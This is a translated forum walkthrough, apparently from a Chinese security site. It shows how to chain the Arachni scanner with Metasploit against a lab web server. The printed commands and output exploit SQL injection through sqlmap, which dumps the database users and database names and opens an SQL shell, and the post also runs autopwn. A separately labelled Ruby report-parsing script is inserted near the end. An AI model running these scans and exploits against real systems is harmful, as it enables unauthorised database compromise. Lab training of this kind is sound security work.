20. Metasploit attacks against the web
Posted on 2012-8-6 16:25:09

# Installation reference: http://www.dis9.com/tech/viewthread.php?tid=39&extra=
This is an automated web security testing tool. Here is how the official site pitches it:
Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

Arachni is smart, it trains itself by learning from the HTTP responses it receives during the audit process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify false-positives.
This big noob thinks there is no better web scanner on Linux, if only it were a bit more user-friendly =。= this brat.

Unlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application's cyclomatic complexity and is able to adjust itself accordingly.
This way attack/input vectors that would otherwise be undetectable by non-humans are seamlessly handled by Arachni.

Installing it

First, these:

    sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev

The crucial gem install stuff isn't written up here; I'm just a poser, to be honest I can't really use it either. If you want to read about it, look here.
Then get the source code:

    git clone git://github.com/Zapotek/arachni.git
    cd arachni
    rake install

Then that's it. Remember to turn on a proxy when running rake, otherwise it's slow.


Then copy it into the MSF plugins:

    $ cp -R arachni/external/metasploit/* metasploit/

OK, that should basically be it; it looks like it should just work. To go after a site with it you first scan with it, then exploit with MSF; that's the basic flow... Start a scan:

    root@Dis9Team:/pen/arachni/bin# ./arachni http://5.5.5.3/index.html --report=metareport:outfile=localhost.afr.msf

The output is localhost.afr.msf; the report is for metasploit, you know what I mean.
Then this dumb thing starts scanning.

Then press Ctrl + C and it displays the report.



Look below at what this dumb thing can do:

    Audit:
            SQL injection
            Blind SQL injection using rDiff analysis
            Blind SQL injection using timing attacks
            CSRF detection
            Code injection (PHP, Ruby, Python, JSP, ASP.NET)
            Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
            LDAP injection
            Path traversal
            Response splitting
            OS command injection (*nix, Windows)
            Blind OS command injection using timing attacks (*nix, Windows)
            Remote file inclusion
            Unvalidated redirects
            XPath injection
            Path XSS
            URI XSS
            XSS
            XSS in event attributes of HTML elements
            XSS in HTML tags
            XSS in HTML 'script' tags
        Recon:
            Allowed HTTP methods
            Back-up files
            Common directories
            Common files
            HTTP PUT
            Insufficient Transport Layer Protection for password forms
            WebDAV detection
            HTTP TRACE detection
            Credit Card number disclosure
            CVS/SVN user disclosure
            Private IP address disclosure
            Common backdoors
            .htaccess LIMIT misconfiguration
            Interesting responses
            HTML object grepper
            E-mail address disclosure
            US Social Security Number disclosure
            Forceful directory listing
            Mixed Resource/Scripting
        Extras
            SVN Digger dirs
            SVN Digger files
            RAFT dirs
            RAFT files


Well, this dumb thing actually did find bugs.


To view the scan results you must first bathe; head is a great command.

    root@Dis9Team:/pen/arachni/bin# head localhost.afr.msf
    ---
    - !ruby/object:ArachniMetareport
      category: n/a
      description: SQL code can be injected into the web application.
      exploit: unix/webapp/arachni_sqlmap
      headers:
        cookie: ""
        From: ""
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: Arachni/0.4.0.3
    root@Dis9Team:/pen/arachni/bin#

So there is something there... Load the exploitation plugin in metasploit:

    msf > load arachni
    [*] Successfully loaded plugin: arachni

Load the scan results:

    msf > arachni_load /pen/arachni/bin/localhost.afr.msf
    [*] Loading report...
    [*] Loaded 3 vulnerabilities.

    Unique exploits
    ===============

        ID  Exploit                             Description
        --  -------                             -----------
        1   unix/webapp/arachni_sqlmap

            This module is designed to be used with the Arachni plug-in.

            From the original:

              This module launches an sqlmap session.
            sqlmap is an automatic SQL injection tool developed in Python.
            Its goal is to detect and take advantage of SQL injection
            vulnerabilities on web applications. Once it detects one
            or more SQL injections on the target host, the user can
            choose among a variety of options to perform an extensive
            back-end database management system fingerprint, retrieve
            DBMS session user and database, enumerate users, password
            hashes, privileges, databases, dump entire or user
            specific DBMS tables/columns, run his own SQL SELECT
            statement, read specific files on the file system and much
            more.

        2   unix/webapp/arachni_php_eval
                                            This module allows complex HTTP requests to be crafted in order to
                                    allow exploitation of PHP eval() vulnerabilities in Unix-like platforms.

                                    Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
                                    i.e. where the payload should go.

                                    Supported vectors: GET, POST, COOKIE, HEADER.
                                    (Mainly for use with the Arachni plug-in.)

        3   unix/webapp/arachni_path_traversal
                                    It exploits path traversal vulnerabilities in order to read the contents of a remote file.
                            It will also try to clean-up any HMTL code that does not belong to the file.

                            This module is designed to be used with the Arachni plug-in.

    Vulnerabilities
    ===============

        ID  Host     Path      Name                            Method  Params                     Exploit
        --  ----     ----      ----                            ------  ------                     -------
        1   5.5.5.3  /sql.php  SQL Injection                   GET     {"id"=>"1XXinjectionXX"}   unix/webapp/arachni_sqlmap
        2   5.5.5.3  /sql.php  Code injection (timing attack)  GET     {"id"=>"XXinjectionXX"}    unix/webapp/arachni_php_eval
        3   5.5.5.3  /1.php    Path Traversal                  GET     {"page"=>"XXinjectionXX"}  unix/webapp/arachni_path_traversal

    [*] Done!
    msf >

View the vulnerable applications:

    msf > arachni_list_vulns

    Vulnerabilities
    ===============

        ID  Host     Path      Name                            Method  Params                     Exploit
        --  ----     ----      ----                            ------  ------                     -------
        1   5.5.5.3  /sql.php  SQL Injection                   GET     {"id"=>"1XXinjectionXX"}   unix/webapp/arachni_sqlmap
        2   5.5.5.3  /sql.php  Code injection (timing attack)  GET     {"id"=>"XXinjectionXX"}    unix/webapp/arachni_php_eval
        3   5.5.5.3  /1.php    Path Traversal                  GET     {"page"=>"XXinjectionXX"}  unix/webapp/arachni_path_traversal

    msf >

Looks like there are 3 usable ones... let's try exploiting one.
Let's try the first one with this dumb tool:

    msf > arachni_manual 1
    [*] Using unix/webapp/arachni_sqlmap .
    [*] Preparing datastore for 'SQL Injection' vulnerability @ 5.5.5.3/sql.php ...
    SRVHOST => 127.0.0.1
    SRVPORT => 11356
    RHOST => 5.5.5.3
    RPORT => 80
    LHOST => 127.0.0.1
    LPORT => 13208
    SSL => false
    GET => id=1XXinjectionXX
    METHOD => GET
    COOKIES =>
    HEADERS => From=::Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/0.4.0.3
    PATH => /sql.php
    [*] Done!
    [-] Unknown variable
    Usage: set [option] [value]

    Set the given option to value.  If value is omitted, print the current value.
    If both are omitted, print options that are currently set.

    If run from a module context, this will set the value in the module's
    datastore.  Use -g to operate on the global datastore

    Compatible payloads
    ===================

        Name  Description
        ----  -----------

    Use: set PAYLOAD
    msf  auxiliary(arachni_sqlmap) >

OK, everything is filled in; now let's run it:

    msf  auxiliary(arachni_sqlmap) > exploit

    [*] exec: /pen/sqlmap/sqlmap.py -u 'http://5.5.5.3:80//sql.php?id=1' --users --dbs --sql-shell -v 0 --cookie ''

        sqlmap/0.9 - automatic SQL injection and database takeover tool

    http://sqlmap.sourceforge.net

    [*] starting at: 05:13:29

    GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
    sqlmap identified the following injection points with a total of 32 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: UNION query
        Title: MySQL UNION query (NULL) - 1 to 10 columns
        Payload: id=-8404 UNION ALL SELECT NULL, CONCAT(CHAR(58,115,107,115,58),IFNULL(CAST(CHAR(83,85,107,81,106,72,90,90,67,101) AS CHAR),CHAR(32)),CHAR(58,97,117,103,58))#

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=1 AND SLEEP(5)
    ---

    web server operating system: Windows
    web application technology: Apache 2.2.21, PHP 5.3.8
    back-end DBMS: MySQL 5.0.11
    database management system users [6]:
    [*] ''@'localhost'
    [*] 'dis9team'@'%'
    [*] 'pma'@'localhost'
    [*] 'root'@'%'
    [*] 'root'@'127.0.0.1'
    [*] 'root'@'localhost'

    available databases [8]:
    [*] cdcol
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] phpmyadmin
    [*] sql
    [*] test
    [*] webauth

    sql-shell>

OK, it worked... Now let's try automatic exploitation.
Speaking of which, this automatic exploitation seems pretty badass:

    msf > arachni_autopwn -a
    [*] Running pwn-jobs...

    [*] [0 established sessions]): Waiting on 3 launched modules to finish execution...
    [*] Running auxiliary/unix/webapp/arachni_path_traversal
    [*] Preparing datastore for 'Path Traversal' vulnerability @ 5.5.5.3/1.php ...
    [*] Running exploit/unix/webapp/arachni_php_eval
    [*] Preparing datastore for 'Code injection (timing attack)' vulnerability @ 5.5.5.3/sql.php ...
    [*] Running auxiliary/unix/webapp/arachni_sqlmap
    [*] Preparing datastore for 'SQL Injection' vulnerability @ 5.5.5.3/sql.php ...

    [*] Started bind handler
    [*] Sending HTTP request for /sql.php
    [*] [0 established sessions]): Waiting on 0 launched modules to finish execution...

    [*] The autopwn command has completed with 0 sessions
    msf >

Plugin info:

    Arachni - Web Application Security Scanner Framework v0.4.0.3 [0.2.5]
           Author: Tasos "Zapotek" Laskos

                   (With the support of the community and the Arachni Team.)

           Website:       http://arachni.segfault.gr - http://github.com/Zapotek/arachni
           Documentation: http://github.com/Zapotek/arachni/wiki

    [~] No modules were specified.
    [~]  -> Will run all mods.
    [~] No audit options were specified.
    [~]  -> Will audit links, forms and cookies.

    [~] Available plugins:

    [*] content_types:
    --------------------
    Name:                Content-types
    Description:        Logs content-types of server responses.
                    It can help you categorize and identify publicly available file-types
                    which in turn can help you identify accidentally leaked files.
    Options:
    [~]         exclude - Exclude content-types that match this regular expression.
    [~]         Type:        string
    [~]         Default:     text
    [~]         Required?:   false

    Author:                Tasos "Zapotek" Laskos
    Version:        0.1.3
    Path:        /pen/arachni/plugins/defaults/content_types.rb

    [*] uniformity:
    --------------------
    Name:                Uniformity (Lack of central sanitization)
    Description:        Analyzes the scan results and logs issues which persist across different pages.
                    This is usually a sign for a lack of a central/single point of input sanitization,
                    a bad coding practise.
    Author:                Tasos "Zapotek" Laskos
    Version:        0.1.1
    Path:        /pen/arachni/plugins/defaults/metamodules/uniformity.rb

    [*] timing_attacks:
    --------------------
    Name:                Timing attack anomalies
    Description:        Analyzes the scan results and logs issues that used timing attacks
                    while the affected web pages demonstrated an unusually high response time.
                    A situation which renders the logged issues inconclusive or (possibly) false positives.

                    Pages with high response times usually include heavy-duty processing
                    which makes them prime targets for Denial-of-Service attacks.
    Author:                Tasos "Zapotek" Laskos
    Version:        0.1.4
    Path:        /pen/arachni/plugins/defaults/metamodules/remedies/timing_attacks.rb

    [*] manual_verification:
    --------------------
    Name:                Issues requiring manual verification
    Description:        The HTTP responses of the issues logged by this plugin exhibit a suspicious pattern
                    even before any audit action has taken place -- this challenges the relevance of the audit procedure.

                    Thus, these issues require manual verification.
    Author:                Tasos "Zapotek" Laskos
    Version:        0.1.1
    Path:        /pen/arachni/plugins/defaults/metamodules/remedies/manual_verification.rb

    [*] discovery:
    --------------------
    Name:                Discovery module response anomalies
    Description:        Analyzes the scan results and identifies issues logged by discovery modules
                    (i.e. modules that look for certain files and folders on the server),
                    while the server responses were exhibiting an anomalous factor of similarity.

                    There's a good chance that these issues are false positives.
    Author:                Tasos "Zapotek" Laskos
    Version:        0.1.1
    Path:        /pen/arachni/plugins/defaults/metamodules/remedies/discovery.rb

    [*] healthmap:
    --------------------
    Name:                Health map
    Description:        Generates a simple list of safe/unsafe URLs.
    Author:                Tasos "Zapotek" Laskos
    Version:        0.1.1
    Path:        /pen/arachni/plugins/defaults/healthmap.rb

    [*] autothrottle:
    --------------------
    Name:                AutoThrottle
    Description:        Monitors HTTP response times and automatically
                    throttles the request concurrency in order to maintain stability
                    and prevent from killing the server.
    Author:                Tasos "Zapotek" Laskos
    Version:        0.1.2
    Path:        /pen/arachni/plugins/defaults/autothrottle.rb

    [*] profiler:
    --------------------
    Name:                Profiler
    Description:        Examines the behavior of the web application gathering general statistics
                    and performs taint analysis to determine which inputs affect the output.

                    It does not perform any vulnerability assesment nor does it send attack payloads.
    Author:                Tasos "Zapotek" Laskos
    Version:        0.1.3
    Path:        /pen/arachni/plugins/defaults/profiler.rb

    [*] resolver:
    --------------------
    Name:                Resolver
    Description:        Resolves vulnerable hostnames to IP addresses.
    Author:                Tasos "Zapotek" Laskos
    Version:        0.1
    Path:        /pen/arachni/plugins/defaults/resolver.rb

    [*] cookie_collector:
    --------------------
    Name:                Cookie collector
    Description:        Monitors and collects cookies while establishing a timeline of changes.

                    WARNING: Highly discouraged when the audit includes cookies.
                        It will log thousands of results leading to a huge report,
                        highly increased memory and CPU usage.
    Author:                Tasos "Zapotek" Laskos
    Version:        0.1.3
    Path:        /pen/arachni/plugins/cookie_collector.rb

    [*] waf_detector:
    --------------------
    Name:                WAF Detector
    Description:        Performs basic profiling on the web application
                    in order to assess the existence of a Web Application Firewall.

                    This is a 4 stage process:
                       1. Grab the original page as is
                       2. Send a lot of innocent (vanilla) strings in non-existent inputs so as to profile normal behavior
                       3. Send a lot of suspicious (spicy) strings in non-existent inputs and check if behavior changes
                       4. Make heads or tails of the gathered responses

                     Steps 1 to 3 will be repeated _precision_ times (default: 5) and the responses will be averaged using rDiff analysis.
    Options:
    [~]         precision - Stage precision (how many times to perform each detection stage).
    [~]         Type:        integer
    [~]         Default:     5
    [~]         Required?:   false

    Author:                Tasos "Zapotek" Laskos
    Version:        0.1.1
    Path:        /pen/arachni/plugins/waf_detector.rb

    [*] http_dicattack:
    --------------------
    Name:                HTTP dictionary attacker
    Description:        Uses wordlists to crack password protected directories.
                    If the cracking process is successful the found credentials will be set
                    framework-wide and used for the duration of the audit.
                    If that's not what you want set the crawler's link-count limit to "0".
    Options:
    [~]         username_list - File with a list of usernames (newline separated).
    [~]         Type:        path
    [~]         Default:
    [~]         Required?:   true

    [~]         password_list - File with a list of passwords (newline separated).
    [~]         Type:        path
    [~]         Default:
    [~]         Required?:   true

    Author:                Tasos "Zapotek" Laskos
    Version:        0.1
    Path:        /pen/arachni/plugins/http_dicattack.rb

    [*] libnotify:
    --------------------
    Name:                libnotify
    Description:        Uses the libnotify library to send notifications for each discovered issue
                    and a summary at the end of the scan.
    Options:
    [~]         for_every_issue - Show every issue.
    [~]         Type:        bool
    [~]         Default:     true
    [~]         Required?:   false

    Author:                Tasos "Zapotek" Laskos
    Version:        0.1
    Path:        /pen/arachni/plugins/libnotify.rb

    [*] rescan:
    --------------------
    Name:                ReScan
    Description:        It uses the AFR report of a previous scan to
                    extract the sitemap in order to avoid a redundant crawl.

    Options:
    [~]         afr - Path to the AFR report.
    [~]         Type:        path
    [~]         Default:
    [~]         Required?:   true

    Author:                Tasos "Zapotek" Laskos
    Version:        0.1
    Path:        /pen/arachni/plugins/rescan.rb

    [*] email_notify:
    --------------------
    Name:                E-mail notify
    Description:        Sends a notification (and optionally a report) over SMTP
                    at the end of the scan.
    Options:
    [~]         to - E-mail address of the receiver.
    [~]         Type:        string
    [~]         Default:
    [~]         Required?:   true

    [~]         cc - E-mail address to which to send a carbon copy of the notification.
    [~]         Type:        string
    [~]         Default:
    [~]         Required?:   false

    [~]         bcc - E-mail address for a blind carbon copy.
    [~]         Type:        string
    [~]         Default:
    [~]         Required?:   false

    [~]         from - E-mail address of the sender.
    [~]         Type:        string
    [~]         Default:
    [~]         Required?:   true

    [~]         server_address - Address of the SMTP server to use.
    [~]         Type:        address
    [~]         Default:
    [~]         Required?:   true

    [~]         server_port - SMTP port.
    [~]         Type:        port
    [~]         Default:
    [~]         Required?:   true

    [~]         tls - Use TLS/SSL?.
    [~]         Type:        bool
    [~]         Default:
    [~]         Required?:   false

    [~]         username - SMTP username.
    [~]         Type:        string
    [~]         Default:
    [~]         Required?:   true

    [~]         password - SMTP password.
    [~]         Type:        string
    [~]         Default:
    [~]         Required?:   true

    [~]         authentication - Authentication.
    [~]         Type:        string
    [~]         Default:     plain
    [~]         Required?:   false

    [~]         report -  (accepted: txt, xml, html, json, yaml, marshalnone)
    [~]         Type:        enum
    [~]         Default:     txt
    [~]         Required?:   false

    Author:                Tasos "Zapotek" Laskos
    Version:        0.1
    Path:        /pen/arachni/plugins/email_notify.rb

    [*] proxy:
    --------------------
    Name:                Proxy
    Description:        Gathers data based on user actions and exchanged HTTP
                    traffic and pushes that data to the framework's page-queue to be audited.
                    It also updates the framework cookies with the cookies of the HTTP requests and
                    responses, thus it can also be used to login to a web application.
    Options:
    [~]         port - Port to bind to.
    [~]         Type:        port
    [~]         Default:     8282
    [~]         Required?:   false

    [~]         bind_address - IP address to bind to.
    [~]         Type:        address
    [~]         Default:     0.0.0.0
    [~]         Required?:   false

    Author:                Tasos "Zapotek" Laskos
    Version:        0.1.2
    Path:        /pen/arachni/plugins/proxy.rb

    [*] form_dicattack:
    --------------------
    Name:                Form dictionary attacker
    Description:        Uses wordlists to crack login forms.
                    If the cracking process is successful the found credentials will be set
                    framework-wide and used for the duration of the audit.
                    If that's not what you want set the crawler's link-count limit to "0".
    Options:
    [~]         username_list - File with a list of usernames (newline separated).
    [~]         Type:        path
    [~]         Default:
    [~]         Required?:   true

    [~]         password_list - File with a list of passwords (newline separated).
    [~]         Type:        path
    [~]         Default:
    [~]         Required?:   true

    [~]         username_field - The name of the username form field.
    [~]         Type:        string
    [~]         Default:
    [~]         Required?:   true

    [~]         password_field - The name of the password form field.
    [~]         Type:        string
    [~]         Default:
    [~]         Required?:   true

    [~]         login_verifier - A string that will be used to verify a successful login.
                        For example, if a logout link only appears when a user is logged in then it can be a perfect choice.
    [~]         Type:        string
    [~]         Default:
    [~]         Required?:   true

    Author:                Tasos "Zapotek" Laskos
    Version:        0.1
    Path:        /pen/arachni/plugins/form_dicattack.rb

    [*] autologin:
    --------------------
    Name:                AutoLogin
    Description:        It looks for the login form in the user provided URL,
                    merges its input fields with the user supplied parameters and sets the cookies
                    of the response and request as framework-wide cookies to be used by the spider later on.

    Options:
    [~]         url - The URL that contains the login form.
    [~]         Type:        url
    [~]         Default:
    [~]         Required?:   true

    [~]         params - Form parameters to submit. ( username=user&password=pass )
    [~]         Type:        string
    [~]         Default:
    [~]         Required?:   true

    Author:                Tasos "Zapotek" Laskos
    Version:        0.1.1
    Path:        /pen/arachni/plugins/autologin.rb

    [*] beep_notify:
    --------------------
    Name:                Beep notify
    Description:        It beeps when the scan finishes.
    Options:
    [~]         repeat - How many times to beep.
    [~]         Type:        integer
    [~]         Default:     4
    [~]         Required?:   false

    [~]         interval - How long to wait between beeps.
    [~]         Type:        float
    [~]         Default:     0.4
    [~]         Required?:   false

    Author:                Tasos "Zapotek" Laskos
    Version:        0.1
    Path:        /pen/arachni/plugins/beep_notify.rb
Module list (mods):
- interesting_responses
- http_put
- common_directories
- common_files
- mixed_resource
- credit_card
- html_objects
- captcha
- ssn
- private_ip
- emails
- cvs_svn_users
- xst
- allowed_methods
- backdoors
- htaccess_limit
- unencrypted_password_forms
- webdav
- directory_listing
- backup_files
- sqli
- csrf
- sqli_blind_timing
- xss_uri
- unvalidated_redirect
- xss_event
- trainer
- os_cmd_injection
- xpath
- response_splitting
- xss_path
- code_injection_timing
- code_injection
- ldapi
- rfi
- xss_script_tag
- xss_tag
- path_traversal
- sqli_blind_rdiff
- xss
- os_cmd_injection_timing
Selecting modules, for example:

    root@Dis9Team:/pen/arachni/bin# ./arachni http://www.webscantest.com --report=metareport:outfile=1.afr.msf --mods=sqli,sqli_blind_timing,os_cmd_injection,xpath,code_injection,sqli_blind_rdiff,os_cmd_injection_timing
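As an added example (not code from the post, from Arachni or from the Metasploit plug-in): a small Ruby script that reads a metareport in the shape of the `head localhost.afr.msf` output above and rebuilds the unique-exploit and vulnerability listing that `arachni_load` printed, flagging the timing-attack finding for manual verification, as the timing_attacks plug-in description recommends for such results. The attribute names host, path, name, method and params are assumptions taken from the plug-in's table; the embedded report is constructed from the post's three findings.

```ruby
require 'yaml'

# Stand-in for the class the report is tagged with (!ruby/object:ArachniMetareport),
# so Psych can revive the objects without Arachni installed. Attribute names other
# than those visible in the post (host, path, name, method, params) are assumptions.
class ArachniMetareport
  attr_reader :attrs

  def init_with(coder)   # Psych hands over the mapping's key/value pairs
    @attrs = coder.map
  end

  def [](key)
    @attrs[key.to_s]
  end
end

# Parse an .afr.msf file; only ArachniMetareport objects are permitted to be revived.
def load_metareport(text)
  YAML.safe_load(text, permitted_classes: [ArachniMetareport])
end

# Exploit modules the findings map to (the plug-in's "Unique exploits" table).
def unique_exploits(findings)
  findings.map { |f| f['exploit'] }.compact.uniq.sort
end

# Parameters carrying the XXinjectionXX marker, i.e. where the payload would go.
def injected_params(finding)
  (finding['params'] || {}).select { |_, v| v.to_s.include?('XXinjectionXX') }.keys
end

# Timing-based findings are inconclusive on slow pages (see the timing_attacks
# plug-in in the plug-in list), so they are flagged for manual verification.
def needs_manual_verification?(finding)
  !!(finding['name'].to_s =~ /timing attack/i)
end

def triage(text)
  findings = load_metareport(text)
  rows = findings.each_with_index.map do |f, i|
    { id: i + 1, host: f['host'], path: f['path'], name: f['name'],
      method: f['method'], params: injected_params(f), exploit: f['exploit'],
      verify: needs_manual_verification?(f) }
  end
  { exploits: unique_exploits(findings), findings: rows }
end

# Constructed sample in the shape of the `head localhost.afr.msf` output,
# carrying the three findings from the post's vulnerability table.
SAMPLE_REPORT = <<~YAML
  ---
  - !ruby/object:ArachniMetareport
    description: SQL code can be injected into the web application.
    exploit: unix/webapp/arachni_sqlmap
    host: 5.5.5.3
    path: /sql.php
    name: SQL Injection
    method: GET
    params:
      id: 1XXinjectionXX
    headers:
      User-Agent: Arachni/0.4.0.3
  - !ruby/object:ArachniMetareport
    exploit: unix/webapp/arachni_php_eval
    host: 5.5.5.3
    path: /sql.php
    name: Code injection (timing attack)
    method: GET
    params:
      id: XXinjectionXX
  - !ruby/object:ArachniMetareport
    exploit: unix/webapp/arachni_path_traversal
    host: 5.5.5.3
    path: /1.php
    name: Path Traversal
    method: GET
    params:
      page: XXinjectionXX
YAML

if __FILE__ == $0
  r = triage(SAMPLE_REPORT)
  puts "Unique exploits: #{r[:exploits].join(', ')}"
  r[:findings].each { |f| puts "#{f[:id]} #{f[:host]}#{f[:path]} #{f[:name]} #{f[:exploit]}#{f[:verify] ? ' (verify manually)' : ''}" }
end
```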





Posted on 2015-10-20 14:55:37
Got it, learned something..
